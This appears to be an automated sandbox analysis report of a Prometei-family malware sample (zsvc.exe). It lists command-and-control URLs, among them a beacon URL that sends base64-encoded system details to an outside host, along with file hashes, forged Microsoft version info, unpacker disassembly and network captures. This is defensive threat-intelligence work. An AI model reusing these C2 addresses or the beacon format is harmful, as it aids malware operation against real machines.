            http://p1.feefreepool.net/cgi-bin/prometei.cgiexe0%Avira URL Cloudsafe
            http://p1.feefreepool.net/cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJbnRlbChSKSBDb3JlKFRNKTIgQ1BVIDY2MDAgQCAyLjQwIEdIeg0KDQoNClNGMURFUzlLQVMNCk5TT3V3IE9mDQoNCjEwLjAuMTcxMzQuMQ0KDQoNCjIwMjAwOTMwMDgwMjI5LjQ5MzE3Ny00MjANCk1pY3Jvc29mdCBXaW5kb3dzIDEwIFBybw0KfQ0K&h=computer&i=90Z405GXDA2Q5271&enckey=BtO0tzJv2apOB7qyzIW7zWStGW/UHBc4Xxf1Kg/hg-0ejQgNvvOI-nwRaXMjLhcvacc8U4MXZ7rGYP3FggtsNhWMcIqYeNGD/JknHi-IV66WOa6UuMMRKvZg2a3fLLQAOxVELNFmUML3ZKJUE7iUbF/IJ7fzTHFAPCETqP4WJyQ_0%Avira URL Cloudsafe
            http://p1.feefreepool.net/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
            http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
            https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgipi.dllD0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            p1.feefreepool.net
            88.198.246.242
            truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271true
            • Avira URL Cloud: safe
            unknown
            http://p1.feefreepool.net/cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJbnRlbChSKSBDb3JlKFRNKTIgQ1BVIDY2MDAgQCAyLjQwIEdIeg0KDQoNClNGMURFUzlLQVMNCk5TT3V3IE9mDQoNCjEwLjAuMTcxMzQuMQ0KDQoNCjIwMjAwOTMwMDgwMjI5LjQ5MzE3Ny00MjANCk1pY3Jvc29mdCBXaW5kb3dzIDEwIFBybw0KfQ0K&h=computer&i=90Z405GXDA2Q5271&enckey=BtO0tzJv2apOB7qyzIW7zWStGW/UHBc4Xxf1Kg/hg-0ejQgNvvOI-nwRaXMjLhcvacc8U4MXZ7rGYP3FggtsNhWMcIqYeNGD/JknHi-IV66WOa6UuMMRKvZg2a3fLLQAOxVELNFmUML3ZKJUE7iUbF/IJ7fzTHFAPCETqP4WJyQ_true
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://p1.feefreepool.net/cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJbsqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmptrue
            • Avira URL Cloud: safe
            unknown
            https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgizsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgifiersqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiWsqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjzsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgizsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q52710003sqhost.exe, 0000001B.00000002.468366246.000000000056B000.00000004.00000020.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://p1.feefreepool.net/cgi-bin/prometei.cgiexesqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://p1.feefreepool.net/cgi-bin/prometei.cgizsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgizsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgipi.dllDsqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmptrue
            • Avira URL Cloud: safe
            unknown

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            88.198.246.242
            p1.feefreepool.netGermany
            24940HETZNER-ASDEtrue

            General Information

            Joe Sandbox Version:31.0.0 Emerald
            Analysis ID:373955
            Start date:23.03.2021
            Start time:14:07:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 6m 26s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:zsvc.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:40
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.mine.winEXE@69/5@2/1
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:Failed
            HCA Information:Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            Show All
            • Excluded IPs from analysis (whitelisted): 52.255.188.83, 13.64.90.137, 104.42.151.234, 104.43.139.144, 51.11.168.160, 95.100.54.203, 20.54.26.129, 13.88.21.125, 23.0.174.200, 23.0.174.185, 20.50.102.62, 23.10.249.26, 23.10.249.43
            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            14:07:55API Interceptor1045x Sleep call for process: sqhost.exe modified
            14:08:05API Interceptor2x Sleep call for process: WMIC.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            88.198.246.2423V9alTXIliGet hashmaliciousBrowse
            • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=MKWJIGBKXJXI0948
            promet16Get hashmaliciousBrowse
            • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=0X81G723HYG17S60
            promet15Get hashmaliciousBrowse
            • p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=6214X121I3A61W1S
            promet2Get hashmaliciousBrowse
            • p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=MU2G1NCM0HDF3L2N
            EKbGofM1r6Get hashmaliciousBrowse
            • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=ENEP5O05YTLM46K2

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            p1.feefreepool.net3V9alTXIliGet hashmaliciousBrowse
            • 88.198.246.242
            promet16Get hashmaliciousBrowse
            • 88.198.246.242
            promet15Get hashmaliciousBrowse
            • 88.198.246.242
            promet2Get hashmaliciousBrowse
            • 88.198.246.242
            EKbGofM1r6Get hashmaliciousBrowse
            • 88.198.246.242

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            HETZNER-ASDEtp007aVv7M.exeGet hashmaliciousBrowse
            • 88.99.66.31
            TwcfXC0O1i.exeGet hashmaliciousBrowse
            • 195.201.225.248
            tp007aVv7M.exeGet hashmaliciousBrowse
            • 88.99.66.31
            AHi0Cpu7qQ.exeGet hashmaliciousBrowse
            • 195.201.225.248
            L1Zx7vxPkv.exeGet hashmaliciousBrowse
            • 88.99.66.31
            sMltm4J5LW.exeGet hashmaliciousBrowse
            • 195.201.225.248
            rAMyXCnC4h.exeGet hashmaliciousBrowse
            • 88.99.66.31
            9WojZ3Q0sH.exeGet hashmaliciousBrowse
            • 195.201.225.248
            yx8DBT3r5r.exeGet hashmaliciousBrowse
            • 136.243.138.29
            still.exeGet hashmaliciousBrowse
            • 135.181.187.43
            VmSdHCbFfl.exeGet hashmaliciousBrowse
            • 88.99.66.31
            12Ufa95sAw.exeGet hashmaliciousBrowse
            • 88.99.66.31
            mcRrjT7JMX.exeGet hashmaliciousBrowse
            • 135.181.121.237
            dkmhyAXru7.exeGet hashmaliciousBrowse
            • 88.99.66.31
            PAYMENT_.exeGet hashmaliciousBrowse
            • 188.40.21.44
            7hmnnRZchJ.exeGet hashmaliciousBrowse
            • 88.99.66.31
            9MyoOYNXKe.exeGet hashmaliciousBrowse
            • 88.99.66.31
            iz8AtqlQeh.exeGet hashmaliciousBrowse
            • 88.99.66.31
            dd7211d8c5d8b0e6290b9eb79787d64b73a91bde129cc.exeGet hashmaliciousBrowse
            • 88.99.66.31
            0XzEd3qwnn.exeGet hashmaliciousBrowse
            • 88.99.66.31

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Windows\zsvc.exe
            Process:C:\Windows\System32\cmd.exe
            File Type:PE32+ executable (GUI) x86-64, for MS Windows
            Category:dropped
            Size (bytes):152576
            Entropy (8bit):7.8762606428399815
            Encrypted:false
            SSDEEP:3072:WfaJb/HHzTGsbVY6XfRPLlv3vJMiGndRRBmRKuvZVWrMeX7Y1:Tb/HzTXPJR3v9Gn3X8KsYr7Y
            MD5:84452E3633C40030E72C9375C8A3CACB
            SHA1:FE65853FF86E5783C3D70EDCBE0771447967AB0C
            SHA-256:F0A5B257F16C4CCFF520365EBC143F09CCF233E642BF540B5B90A2BBDB43D5B4
            SHA-512:519B8AF4E4F1BCA640B009307FB1528D617C7E00E06159FE30390C80B016F6E34B1391E367953E127D40C70CCB65DA8C5AB5D311E6AEFE7F2F3EE7DE2B4AEC7B
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 68%
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V...j...j...j...B..j..T;Z..j.......j..T;d.Ej..T;e..j.......j...j..j...8`..j...8^..j...j...j...8[..j..Rich.j..........PE..d.....Q`..........#......P........&.0.(...&....@..............................(........... ...................................................(.......(.......(..*..................................................x.(.p...........................................UPX0......&.............................UPX1.....P....&..H..................@....rsrc.........(......L..............@......................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!.$..
            C:\Windows\zsvc.exe:Zone.Identifier
            Process:C:\Windows\System32\cmd.exe
            File Type:ASCII text, with CRLF line terminators
            Category:modified
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview: [ZoneTransfer]....ZoneId=0
            \Device\ConDrv
            Process:C:\Windows\System32\netsh.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):44
            Entropy (8bit):4.073210744553412
            Encrypted:false
            SSDEEP:3:4KFXczF5c2WMMABGVcMv:lXczF5jWMacu
            MD5:656D246C6CE9A47F07EC793B6BB27F07
            SHA1:0C098838274F64DBB02500A68B855E6703DDDAF1
            SHA-256:77429FFF9C65F96BC190C4C14916423F0196A2A570970A095285364743172AF4
            SHA-512:9E47C89948CF63770F5E59B793B8625364C9F9B679B80B9CD821ABC9866C0BC23608AEEE9794AC45E547FF11BBD47DA7BDA640D72218507EE2FA9382A9419476
            Malicious:false
            Preview: ..No rules match the specified criteria.....

            Static File Info

            General

            File type:PE32+ executable (GUI) x86-64, for MS Windows
            Entropy (8bit):7.8762606428399815
            TrID:
            • Win64 Executable GUI (202006/5) 81.26%
            • UPX compressed Win32 Executable (30571/9) 12.30%
            • Win64 Executable (generic) (12005/4) 4.83%
            • Generic Win/DOS Executable (2004/3) 0.81%
            • DOS Executable Generic (2002/1) 0.81%
            File name:zsvc.exe
            File size:152576
            MD5:84452e3633c40030e72c9375c8a3cacb
            SHA1:fe65853ff86e5783c3d70edcbe0771447967ab0c
            SHA256:f0a5b257f16c4ccff520365ebc143f09ccf233e642bf540b5b90a2bbdb43d5b4
            SHA512:519b8af4e4f1bca640b009307fb1528d617c7e00e06159fe30390c80b016f6e34b1391e367953e127d40c70ccb65da8c5ab5d311e6aefe7f2f3ee7de2b4aec7b
            SSDEEP:3072:WfaJb/HHzTGsbVY6XfRPLlv3vJMiGndRRBmRKuvZVWrMeX7Y1:Tb/HzTXPJR3v9Gn3X8KsYr7Y
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V....j...j...j....B..j..T;Z..j.......j..T;d.Ej..T;e..j.......j...j...j...8`..j...8^..j...j...j...8[..j..Rich.j..........PE..d..

            File Icon

            Icon Hash:00828e8e8686b000

            Static PE Info

            General

            Entrypoint:0x14128d530
            Entrypoint Section:UPX1
            Digitally signed:false
            Imagebase:0x140000000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED
            DLL Characteristics:TERMINAL_SERVER_AWARE, HIGH_ENTROPY_VA
            Time Stamp:0x60510FF1 [Tue Mar 16 20:07:13 2021 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:2
            File Version Major:5
            File Version Minor:2
            Subsystem Version Major:5
            Subsystem Version Minor:2
            Import Hash:85a416bf227976ca19a20a4bd883157c

            Entrypoint Preview

            Instruction
            push ebx
            push esi
            push edi
            push ebp
            dec eax
            lea esi, dword ptr [FFFDBAC5h]
            dec eax
            lea edi, dword ptr [esi-01268000h]
            push edi
            xor ebx, ebx
            xor ecx, ecx
            dec eax
            or ebp, FFFFFFFFh
            call 00007F5F6C80E8E5h
            add ebx, ebx
            je 00007F5F6C80E894h
            rep ret
            mov ebx, dword ptr [esi]
            dec eax
            sub esi, FFFFFFFCh
            adc ebx, ebx
            mov dl, byte ptr [esi]
            rep ret
            dec eax
            lea eax, dword ptr [edi+ebp]
            cmp ecx, 05h
            mov dl, byte ptr [eax]
            jbe 00007F5F6C80E8B3h
            dec eax
            cmp ebp, FFFFFFFCh
            jnbe 00007F5F6C80E8ADh
            sub ecx, 04h
            mov edx, dword ptr [eax]
            dec eax
            add eax, 04h
            sub ecx, 04h
            mov dword ptr [edi], edx
            dec eax
            lea edi, dword ptr [edi+04h]
            jnc 00007F5F6C80E881h
            add ecx, 04h
            mov dl, byte ptr [eax]
            je 00007F5F6C80E8A2h
            dec eax
            inc eax
            mov byte ptr [edi], dl
            sub ecx, 01h
            mov dl, byte ptr [eax]
            dec eax
            lea edi, dword ptr [edi+01h]
            jne 00007F5F6C80E882h
            rep ret
            cld
            inc ecx
            pop ebx
            jmp 00007F5F6C80E89Ah
            dec eax
            inc esi
            mov byte ptr [edi], dl
            dec eax
            inc edi
            mov dl, byte ptr [esi]
            add ebx, ebx
            jne 00007F5F6C80E89Ch
            mov ebx, dword ptr [esi]
            dec eax
            sub esi, FFFFFFFCh
            adc ebx, ebx
            mov dl, byte ptr [esi]
            jc 00007F5F6C80E878h
            lea eax, dword ptr [ecx+01h]
            jmp 00007F5F6C80E899h
            dec eax
            inc ecx
            call ebx
            adc eax, eax
            inc ecx
            call ebx
            adc eax, eax
            add ebx, ebx
            jne 00007F5F6C80E89Ch
            mov ebx, dword ptr [esi]
            dec eax
            sub esi, FFFFFFFCh
            adc ebx, ebx
            mov dl, byte ptr [esi]
            jnc 00007F5F6C80E876h
            sub eax, 03h
            jc 00007F5F6C80E8ABh
            shl eax, 08h
            movzx edx, dl
            or eax, edx
            dec eax
            inc esi
            xor eax, FFFFFFFFh
            je 00007F5F6C80E8EAh
            sar eax, 1

            Rich Headers

            Programming Language:
            • [RES] VS2013 build 21005
            • [LNK] VS2013 build 21005
            • [IMP] VS2008 SP1 build 30729

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x128e51c0x2b8.rsrc
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x128e0000x51c.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x12810000x2a90UPX1
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x128d7780x70UPX1
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            UPX00x10000x12680000x0unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
            UPX10x12690000x250000x24800False0.940998234161data7.89809065736IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .rsrc0x128e0000x10000x800False0.45263671875data4.22618252979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_VERSION0x128e0a40x2f4dataEnglishUnited States
            RT_MANIFEST0x128e39c0x17dXML 1.0 document textEnglishUnited States

            Imports

            DLLImport
            ADVAPI32.dllOpenProcessToken
            CRYPT32.dllCryptDecodeObjectEx
            KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
            ole32.dllCoUninitialize
            OLEAUT32.dllSysAllocString
            PSAPI.DLLEnumProcesses
            SHELL32.dllShellExecuteA
            USER32.dllwsprintfA
            wevtapi.dllEvtRender
            WS2_32.dll__WSAFDIsSet

            Version Infos

            DescriptionData
            LegalCopyrightCopyright (C) 2016
            InternalNamesqhost.exe
            FileVersion2.0.0.0
            CompanyNameMicrosoft Corporation
            ProductNamesqhost.exe
            ProductVersion2.0.0.0
            FileDescriptionHost Process for Windows Service
            OriginalFilenamesqhost.exe
            Translation0x0409 0x04b0

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Mar 23, 2021 14:07:56.375312090 CET4970780192.168.2.388.198.246.242
            Mar 23, 2021 14:07:56.396594048 CET804970788.198.246.242192.168.2.3
            Mar 23, 2021 14:07:56.396743059 CET4970780192.168.2.388.198.246.242
            Mar 23, 2021 14:07:56.396919012 CET4970780192.168.2.388.198.246.242
            Mar 23, 2021 14:07:56.468348026 CET804970788.198.246.242192.168.2.3
            Mar 23, 2021 14:08:04.421644926 CET804970788.198.246.242192.168.2.3
            Mar 23, 2021 14:08:04.422136068 CET804970788.198.246.242192.168.2.3
            Mar 23, 2021 14:08:04.422231913 CET4970780192.168.2.388.198.246.242
            Mar 23, 2021 14:08:04.441343069 CET4970780192.168.2.388.198.246.242
            Mar 23, 2021 14:08:04.464869976 CET804970788.198.246.242192.168.2.3
            Mar 23, 2021 14:08:09.709420919 CET4971480192.168.2.388.198.246.242
            Mar 23, 2021 14:08:09.730603933 CET804971488.198.246.242192.168.2.3
            Mar 23, 2021 14:08:09.731333971 CET4971480192.168.2.388.198.246.242
            Mar 23, 2021 14:08:09.731378078 CET4971480192.168.2.388.198.246.242
            Mar 23, 2021 14:08:09.803414106 CET804971488.198.246.242192.168.2.3
            Mar 23, 2021 14:08:22.899101973 CET804971488.198.246.242192.168.2.3
            Mar 23, 2021 14:08:22.899607897 CET804971488.198.246.242192.168.2.3
            Mar 23, 2021 14:08:22.899715900 CET4971480192.168.2.388.198.246.242
            Mar 23, 2021 14:08:25.441411972 CET4971480192.168.2.388.198.246.242
            Mar 23, 2021 14:08:25.462812901 CET804971488.198.246.242192.168.2.3

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Mar 23, 2021 14:07:40.082186937 CET5062053192.168.2.38.8.8.8
            Mar 23, 2021 14:07:40.096031904 CET53506208.8.8.8192.168.2.3
            Mar 23, 2021 14:07:40.852046967 CET6493853192.168.2.38.8.8.8
            Mar 23, 2021 14:07:40.864809990 CET53649388.8.8.8192.168.2.3
            Mar 23, 2021 14:07:56.114794970 CET6015253192.168.2.38.8.8.8
            Mar 23, 2021 14:07:56.127768040 CET53601528.8.8.8192.168.2.3
            Mar 23, 2021 14:07:56.356839895 CET5754453192.168.2.38.8.8.8
            Mar 23, 2021 14:07:56.369887114 CET53575448.8.8.8192.168.2.3
            Mar 23, 2021 14:07:57.101492882 CET5598453192.168.2.38.8.8.8
            Mar 23, 2021 14:07:57.114363909 CET53559848.8.8.8192.168.2.3
            Mar 23, 2021 14:07:57.220973015 CET5598580192.168.2.388.198.246.242
            Mar 23, 2021 14:07:57.860291958 CET6418553192.168.2.38.8.8.8
            Mar 23, 2021 14:07:57.872986078 CET53641858.8.8.8192.168.2.3
            Mar 23, 2021 14:07:58.851062059 CET6511053192.168.2.38.8.8.8
            Mar 23, 2021 14:07:58.863910913 CET53651108.8.8.8192.168.2.3
            Mar 23, 2021 14:08:02.588650942 CET5836153192.168.2.38.8.8.8
            Mar 23, 2021 14:08:02.603535891 CET53583618.8.8.8192.168.2.3
            Mar 23, 2021 14:08:04.987948895 CET6349253192.168.2.38.8.8.8
            Mar 23, 2021 14:08:05.001924992 CET53634928.8.8.8192.168.2.3
            Mar 23, 2021 14:08:05.976211071 CET6083153192.168.2.38.8.8.8
            Mar 23, 2021 14:08:05.989204884 CET53608318.8.8.8192.168.2.3
            Mar 23, 2021 14:08:09.693305969 CET6010053192.168.2.38.8.8.8
            Mar 23, 2021 14:08:09.707644939 CET53601008.8.8.8192.168.2.3
            Mar 23, 2021 14:08:12.228287935 CET5319553192.168.2.38.8.8.8
            Mar 23, 2021 14:08:12.241210938 CET53531958.8.8.8192.168.2.3
            Mar 23, 2021 14:08:16.937810898 CET5014153192.168.2.38.8.8.8
            Mar 23, 2021 14:08:16.956253052 CET53501418.8.8.8192.168.2.3
            Mar 23, 2021 14:08:18.329224110 CET5302353192.168.2.38.8.8.8
            Mar 23, 2021 14:08:18.344491005 CET53530238.8.8.8192.168.2.3
            Mar 23, 2021 14:08:18.450423002 CET4956353192.168.2.38.8.8.8
            Mar 23, 2021 14:08:18.477480888 CET53495638.8.8.8192.168.2.3
            Mar 23, 2021 14:08:19.135514021 CET5135253192.168.2.38.8.8.8
            Mar 23, 2021 14:08:19.148343086 CET53513528.8.8.8192.168.2.3
            Mar 23, 2021 14:08:27.270322084 CET5934953192.168.2.38.8.8.8
            Mar 23, 2021 14:08:27.284882069 CET53593498.8.8.8192.168.2.3
            Mar 23, 2021 14:08:36.195553064 CET5708453192.168.2.38.8.8.8
            Mar 23, 2021 14:08:36.214431047 CET53570848.8.8.8192.168.2.3
            Mar 23, 2021 14:08:45.561541080 CET5882353192.168.2.38.8.8.8
            Mar 23, 2021 14:08:45.575577974 CET53588238.8.8.8192.168.2.3
            Mar 23, 2021 14:08:46.761060953 CET5756853192.168.2.38.8.8.8
            Mar 23, 2021 14:08:46.779449940 CET53575688.8.8.8192.168.2.3
            Mar 23, 2021 14:08:58.877156019 CET5054053192.168.2.38.8.8.8
            Mar 23, 2021 14:08:58.889822006 CET53505408.8.8.8192.168.2.3
            Mar 23, 2021 14:09:00.352343082 CET5436653192.168.2.38.8.8.8
            Mar 23, 2021 14:09:00.365499020 CET53543668.8.8.8192.168.2.3
            Mar 23, 2021 14:09:01.377211094 CET5303453192.168.2.38.8.8.8
            Mar 23, 2021 14:09:01.390403032 CET53530348.8.8.8192.168.2.3
            Mar 23, 2021 14:09:11.982743979 CET5776253192.168.2.38.8.8.8
            Mar 23, 2021 14:09:11.995361090 CET53577628.8.8.8192.168.2.3
            Mar 23, 2021 14:09:13.028187037 CET5543553192.168.2.38.8.8.8
            Mar 23, 2021 14:09:13.041990995 CET53554358.8.8.8192.168.2.3
            Mar 23, 2021 14:09:18.379707098 CET5071353192.168.2.38.8.8.8
            Mar 23, 2021 14:09:18.392725945 CET53507138.8.8.8192.168.2.3
            Mar 23, 2021 14:09:18.439229012 CET5613253192.168.2.38.8.8.8
            Mar 23, 2021 14:09:18.451982021 CET53561328.8.8.8192.168.2.3
            Mar 23, 2021 14:09:19.074630976 CET5898753192.168.2.38.8.8.8
            Mar 23, 2021 14:09:19.108567953 CET53589878.8.8.8192.168.2.3
            Mar 23, 2021 14:09:19.424052954 CET5657953192.168.2.38.8.8.8
            Mar 23, 2021 14:09:19.437227964 CET53565798.8.8.8192.168.2.3

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Mar 23, 2021 14:07:56.356839895 CET192.168.2.38.8.8.80x595cStandard query (0)p1.feefreepool.netA (IP address)IN (0x0001)
            Mar 23, 2021 14:08:09.693305969 CET192.168.2.38.8.8.80x13d1Standard query (0)p1.feefreepool.netA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Mar 23, 2021 14:07:56.369887114 CET8.8.8.8192.168.2.30x595cNo error (0)p1.feefreepool.net88.198.246.242A (IP address)IN (0x0001)
            Mar 23, 2021 14:08:09.707644939 CET8.8.8.8192.168.2.30x13d1No error (0)p1.feefreepool.net88.198.246.242A (IP address)IN (0x0001)

            HTTP Request Dependency Graph

            • p1.feefreepool.net

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.34970788.198.246.24280C:\Windows\sqhost.exe
            TimestampkBytes transferredDirectionData
            Mar 23, 2021 14:07:56.396919012 CET1073OUTGET /cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271 HTTP/1.0
            Host: p1.feefreepool.net
            Mar 23, 2021 14:08:04.421644926 CET1138INHTTP/1.1 200 OK
